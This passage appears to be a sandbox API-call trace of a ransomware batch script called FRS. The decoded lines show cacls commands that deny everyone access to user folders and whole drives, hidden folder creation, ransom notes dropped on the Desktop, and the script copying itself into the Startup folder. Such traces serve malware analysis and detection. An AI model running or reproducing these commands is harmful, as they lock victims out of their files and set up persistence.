nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0099.371] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0099.371] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.371] GetFileType (hFile=0x2b8) returned 0x1 [0099.371] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0099.371] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0099.372] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0099.372] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.372] GetFileType (hFile=0x2b8) returned 0x1 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0099.372] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0099.372] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0099.372] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.372] GetFileType (hFile=0x2b8) returned 0x1 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0099.372] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0099.372] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0099.372] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.372] GetFileType (hFile=0x2b8) returned 0x1 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0099.372] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0099.372] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0099.372] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.372] GetFileType (hFile=0x2b8) returned 0x1 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0099.372] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.372] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0099.372] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0099.373] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.373] GetFileType (hFile=0x2b8) returned 0x1 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0099.373] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0099.373] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0099.373] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.373] GetFileType (hFile=0x2b8) returned 0x1 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0099.373] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0099.373] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0099.373] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.373] GetFileType (hFile=0x2b8) returned 0x1 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0099.373] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0099.373] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0099.373] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.373] GetFileType (hFile=0x2b8) returned 0x1 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0099.373] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0099.373] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0099.373] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0099.373] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.373] GetFileType (hFile=0x2b8) returned 0x1 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0099.374] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0099.374] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0099.374] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.374] GetFileType (hFile=0x2b8) returned 0x1 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0099.374] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0099.374] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0099.374] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.374] GetFileType (hFile=0x2b8) returned 0x1 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0099.374] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0099.374] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0099.374] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.374] GetFileType (hFile=0x2b8) returned 0x1 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0099.374] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0099.374] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0099.374] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.374] GetFileType (hFile=0x2b8) returned 0x1 [0099.374] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0099.375] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0099.375] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0099.375] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.375] GetFileType (hFile=0x2b8) returned 0x1 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0099.375] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0099.375] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0099.375] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.375] GetFileType (hFile=0x2b8) returned 0x1 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0099.375] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0099.375] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0099.375] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.375] GetFileType (hFile=0x2b8) returned 0x1 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0099.375] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0099.375] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0099.375] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.375] GetFileType (hFile=0x2b8) returned 0x1 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0099.375] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.375] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0099.376] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0099.376] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.376] GetFileType (hFile=0x2b8) returned 0x1 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0099.376] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0099.376] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0099.376] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.376] GetFileType (hFile=0x2b8) returned 0x1 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0099.376] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0099.376] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0099.376] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.376] GetFileType (hFile=0x2b8) returned 0x1 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0099.376] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0099.376] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0099.376] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.376] GetFileType (hFile=0x2b8) returned 0x1 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0099.376] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.376] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0099.376] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0099.377] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.377] GetFileType (hFile=0x2b8) returned 0x1 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 